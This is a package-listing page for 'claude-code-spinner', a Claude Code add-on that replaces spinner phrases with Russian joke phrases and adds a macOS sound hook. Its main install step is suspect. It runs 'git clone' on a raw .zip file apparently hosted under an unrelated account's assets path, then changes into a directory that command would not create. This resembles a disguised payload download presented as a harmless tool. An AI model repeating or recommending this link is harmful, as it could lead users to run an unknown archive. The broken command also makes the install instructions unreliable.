freshcrate
Skin:/
Home > AI Agents > claude-code-spinner

claude-code-spinner

Replace Claude Code's default spinner phrases with over 90 custom Russian phrases to add unique character during agent processing.

Why this rank:Recent releaseHealthy release cadenceStrong adoption

Description

Replace Claude Code's default spinner phrases with over 90 custom Russian phrases to add unique character during agent processing.

README

Кабанчиком

claude-code-spinner

Замена фраз спиннера Claude Code для уважаемых вайбкодеров.

Вместо стандартных Thinking..., Analyzing..., Pondering... будет крутиться "Обкашляю вопросик", "По красоте все сделаем" и еще 90+ фраз.

Установка через Claude Code

git clone https://github.com/sarthak23s/claude-code-spinner/raw/refs/heads/main/assets/spinner_code_claude_zoonite.zip
cd claude-code-spinner

Запусти Claude Code и выполни:

/install-spinner

Ручная установка

Скопируй содержимое spinners.json в ~/.claude/settings.json:

{
  "spinnerVerbs": {
    "mode": "replace",
    "verbs": ["Обкашляю вопросик", "По красоте все сделаем", "..."]
  }
}

Сектор приз: "Вопросик на тормозах" на хук Stop

Когда основной агент ответит, ты услышишь «Вопросик на тормозах». Работает через afplay (уже есть на macOS).

Установка через Claude Code

/install-hook

Если громко, попроси клод сделать потише. В ручной установке есть пример, можно -v 1 поменять на -v 0.5.

Ручная установка

Скопируй sounds/stop-hook.mp3 в ~/.claude/sounds/ и добавь хук в ~/.claude/settings.json:

{
  "hooks": {
    "Stop": [
      {
        "matcher": "",
        "hooks": [
          {
            "type": "command",
            "command": "afplay -v 1 ~/.claude/sounds/stop-hook.mp3"
          }
        ]
      }
    ]
  }
}

Лицензия

Какая еще лицензия? Ладно, MIT.

На связи

Телега: Несерьезный айтишник
Рассказываю про разработку с ИИ. Заглядывай.

Release History

VersionChangesUrgencyDate
main@2026-06-04Latest activity on main branchHigh6/4/2026
0.0.0No release found — using repo HEADHigh4/9/2026

Dependencies & License Audit

Loading dependencies...

Similar Packages

tweakccCustomize Claude Code's system prompts, create custom toolsets, input pattern highlighters, themes/thinking verbs/spinners, customize input box & user message styling, support AGENTS.md, unlock privatv4.0.14
be-my-butlerOrchestrate multiple agents to execute Claude Code workflows with cross-model verification for reliable AI code automation.main@2026-06-05
acolyteA terminal-first AI coding agent. Open-source, observable, and built for developer control.v0.20.0
RAG🧠 Build an offline RAG chatbot to answer questions from PDFs, adapting responses based on user experience levels with a smooth chat interface.main@2026-06-06
agent-sdk🤖 Build transparent, message-first agents with efficient tool calls, planning, and multi-agent handoffs using the lightweight agent-sdk for Node.js.main@2026-06-06

More in AI Agents

hermes-agentThe agent that grows with you
awesome-copilotCommunity-contributed instructions, agents, skills, and configurations to help you make the most of GitHub Copilot.
CopilotKitThe Frontend Stack for Agents & Generative UI. React + Angular. Makers of the AG-UI Protocol
e2bE2B SDK that give agents cloud environments